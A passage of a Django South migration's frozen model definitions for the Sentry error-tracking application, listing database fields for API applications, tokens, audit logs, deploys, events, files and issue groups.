'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'})
},
'sentry.apiapplication': {
'Meta': {'object_name': 'ApiApplication'},
'allowed_origins': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'client_id': ('django.db.models.fields.CharField', [], {'default': "'77cf05ffe3c94e5d90e8d2debfdf44a3338317c84edf4a1584bccc7e741e5010'", 'unique': 'True', 'max_length': '64'}),
'client_secret': ('sentry.db.models.fields.encrypted.EncryptedTextField', [], {'default': "'5c21e34062d04fcdb2c6c95ae002e02493507d401a1d491c8c8272c07311e256'"}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'homepage_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'default': "'Humble Sawfly'", 'max_length': '64', 'blank': 'True'}),
'owner': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'privacy_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'}),
'redirect_uris': ('django.db.models.fields.TextField', [], {}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'terms_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'})
},
'sentry.apiauthorization': {
'Meta': {'unique_together': "(('user', 'application'),)", 'object_name': 'ApiAuthorization'},
'application': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ApiApplication']", 'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'scope_list': ('sentry.db.models.fields.array.ArrayField', [], {'of': ('django.db.models.fields.TextField', [], {})}),
'scopes': ('django.db.models.fields.BigIntegerField', [], {'default': 'None'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.apigrant': {
'Meta': {'object_name': 'ApiGrant'},
'application': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ApiApplication']"}),
'code': ('django.db.models.fields.CharField', [], {'default': "'a510e2f87b39450998283c8fcb9a2925'", 'max_length': '64', 'db_index': 'True'}),
'expires_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2018, 3, 21, 0, 0)', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'redirect_uri': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'scope_list': ('sentry.db.models.fields.array.ArrayField', [], {'of': ('django.db.models.fields.TextField', [], {})}),
'scopes': ('django.db.models.fields.BigIntegerField', [], {'default': 'None'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.apikey': {
'Meta': {'object_name': 'ApiKey'},
'allowed_origins': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'}),
'label': ('django.db.models.fields.CharField', [], {'default': "'Default'", 'max_length': '64', 'blank': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'key_set'", 'to': "orm['sentry.Organization']"}),
'scope_list': ('sentry.db.models.fields.array.ArrayField', [], {'of': ('django.db.models.fields.TextField', [], {})}),
'scopes': ('django.db.models.fields.BigIntegerField', [], {'default': 'None'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.apitoken': {
'Meta': {'object_name': 'ApiToken'},
'application': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ApiApplication']", 'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'expires_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2018, 4, 20, 0, 0)', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'refresh_token': ('django.db.models.fields.CharField', [], {'default': "'a3ad19998aaa4545964c0162fcd950e8b8f94f0d14dc4bfba4c173a03d2700d6'", 'max_length': '64', 'unique': 'True', 'null': 'True'}),
'scope_list': ('sentry.db.models.fields.array.ArrayField', [], {'of': ('django.db.models.fields.TextField', [], {})}),
'scopes': ('django.db.models.fields.BigIntegerField', [], {'default': 'None'}),
'token': ('django.db.models.fields.CharField', [], {'default': "'035aa96ceba648c99324ae41a4a56d8b9c2ccc8c72314e4fb273262a30dee078'", 'unique': 'True', 'max_length': '64'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.assistantactivity': {
'Meta': {'unique_together': "(('user', 'guide_id'),)", 'object_name': 'AssistantActivity', 'db_table': "'sentry_assistant_activity'"},
'dismissed_ts': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'guide_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'useful': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'viewed_ts': ('django.db.models.fields.DateTimeField', [], {'null': 'True'})
},
'sentry.auditlogentry': {
'Meta': {'object_name': 'AuditLogEntry'},
'actor': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "'audit_actors'", 'null': 'True', 'to': "orm['sentry.User']"}),
'actor_key': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ApiKey']", 'null': 'True', 'blank': 'True'}),
'actor_label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'null': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'target_object': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'target_user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "'audit_targets'", 'null': 'True', 'to': "orm['sentry.User']"})
},
'sentry.authenticator': {
'Meta': {'unique_together': "(('user', 'type'),)", 'object_name': 'Authenticator', 'db_table': "'auth_authenticator'"},
'config': ('sentry.db.models.fields.encrypted.EncryptedPickledObjectField', [], {}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedAutoField', [], {'primary_key': 'True'}),
'last_used_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.authidentity': {
'Meta': {'unique_together': "(('auth_provider', 'ident'), ('auth_provider', 'user'))", 'object_name': 'AuthIdentity'},
'auth_provider': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.AuthProvider']"}),
'data': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'last_synced': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_verified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.authprovider': {
'Meta': {'object_name': 'AuthProvider'},
'config': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'default_global_access': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'default_role': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '50'}),
'default_teams': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Team']", 'symmetrical': 'False', 'blank': 'True'}),
'flags': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_sync': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']", 'unique': 'True'}),
'provider': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'sync_time': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'})
},
'sentry.broadcast': {
'Meta': {'object_name': 'Broadcast'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_expires': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2018, 3, 28, 0, 0)', 'null': 'True', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'link': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'upstream_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'})
},
'sentry.broadcastseen': {
'Meta': {'unique_together': "(('broadcast', 'user'),)", 'object_name': 'BroadcastSeen'},
'broadcast': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Broadcast']"}),
'date_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.commit': {
'Meta': {'unique_together': "(('repository_id', 'key'),)", 'object_name': 'Commit', 'index_together': "(('repository_id', 'date_added'),)"},
'author': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.CommitAuthor']", 'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'message': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'repository_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {})
},
'sentry.commitauthor': {
'Meta': {'unique_together': "(('organization_id', 'email'), ('organization_id', 'external_id'))", 'object_name': 'CommitAuthor'},
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'external_id': ('django.db.models.fields.CharField', [], {'max_length': '164', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'})
},
'sentry.commitfilechange': {
'Meta': {'unique_together': "(('commit', 'filename'),)", 'object_name': 'CommitFileChange'},
'commit': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Commit']"}),
'filename': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '1'})
},
'sentry.counter': {
'Meta': {'object_name': 'Counter', 'db_table': "'sentry_projectcounter'"},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'unique': 'True'}),
'value': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.deletedorganization': {
'Meta': {'object_name': 'DeletedOrganization'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'actor_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'actor_label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'date_deleted': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'reason': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'})
},
'sentry.deletedproject': {
'Meta': {'object_name': 'DeletedProject'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'actor_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'actor_label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'date_deleted': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'organization_name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'organization_slug': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'reason': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'})
},
'sentry.deletedteam': {
'Meta': {'object_name': 'DeletedTeam'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'actor_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'actor_label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'date_deleted': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'organization_name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'organization_slug': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}),
'reason': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'})
},
'sentry.deploy': {
'Meta': {'object_name': 'Deploy'},
'date_finished': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_started': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'environment_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'notified': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
'sentry.distribution': {
'Meta': {'unique_together': "(('release', 'name'),)", 'object_name': 'Distribution'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"})
},
'sentry.dsymapp': {
'Meta': {'unique_together': "(('project', 'platform', 'app_id'),)", 'object_name': 'DSymApp'},
'app_id': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_synced': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'platform': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'sync_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'})
},
'sentry.email': {
'Meta': {'object_name': 'Email'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('sentry.db.models.fields.citext.CIEmailField', [], {'unique': 'True', 'max_length': '75'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'})
},
'sentry.environment': {
'Meta': {'unique_together': "(('project_id', 'name'), ('organization_id', 'name'))", 'object_name': 'Environment'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Project']", 'through': "orm['sentry.EnvironmentProject']", 'symmetrical': 'False'})
},
'sentry.environmentproject': {
'Meta': {'unique_together': "(('project', 'environment'),)", 'object_name': 'EnvironmentProject'},
'environment': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Environment']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_hidden': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.event': {
'Meta': {'unique_together': "(('project_id', 'event_id'),)", 'object_name': 'Event', 'db_table': "'sentry_message'", 'index_together': "(('group_id', 'datetime'),)"},
'data': ('sentry.db.models.fields.node.NodeField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'db_column': "'message_id'"}),
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True', 'blank': 'True'}),
'time_spent': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'null': 'True'})
},
'sentry.eventmapping': {
'Meta': {'unique_together': "(('project_id', 'event_id'),)", 'object_name': 'EventMapping'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.eventprocessingissue': {
'Meta': {'unique_together': "(('raw_event', 'processing_issue'),)", 'object_name': 'EventProcessingIssue'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'processing_issue': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ProcessingIssue']"}),
'raw_event': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.RawEvent']"})
},
'sentry.eventtag': {
'Meta': {'unique_together': "(('event_id', 'key_id', 'value_id'),)", 'object_name': 'EventTag', 'index_together': "(('group_id', 'key_id', 'value_id'),)"},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'value_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.eventuser': {
'Meta': {'unique_together': "(('project_id', 'ident'), ('project_id', 'hash'))", 'object_name': 'EventUser', 'index_together': "(('project_id', 'email'), ('project_id', 'username'), ('project_id', 'ip_address'))"},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'})
},
'sentry.featureadoption': {
'Meta': {'unique_together': "(('organization', 'feature_id'),)", 'object_name': 'FeatureAdoption'},
'applicable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'complete': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_completed': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'feature_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"})
},
'sentry.file': {
'Meta': {'object_name': 'File'},
'blob': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'legacy_blob'", 'null': 'True', 'to': "orm['sentry.FileBlob']"}),
'blobs': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.FileBlob']", 'through': "orm['sentry.FileBlobIndex']", 'symmetrical': 'False'}),
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True', 'db_index': 'True'}),
'headers': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'path': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'size': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'sentry.fileblob': {
'Meta': {'object_name': 'FileBlob'},
'checksum': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'path': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'size': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'})
},
'sentry.fileblobindex': {
'Meta': {'unique_together': "(('file', 'blob', 'offset'),)", 'object_name': 'FileBlobIndex'},
'blob': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.FileBlob']"}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'offset': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {})
},
'sentry.fileblobowner': {
'Meta': {'unique_together': "(('blob', 'organization'),)", 'object_name': 'FileBlobOwner'},
'blob': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.FileBlob']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"})
},
'sentry.group': {
'Meta': {'unique_together': "(('project', 'short_id'),)", 'object_name': 'Group', 'db_table': "'sentry_groupedmessage'", 'index_together': "(('project', 'first_release'),)"},
'active_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True', 'blank': 'True'}),
'first_release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']", 'null': 'True', 'on_delete': 'models.PROTECT'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_public': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'level': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'num_comments': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'null': 'True'}),
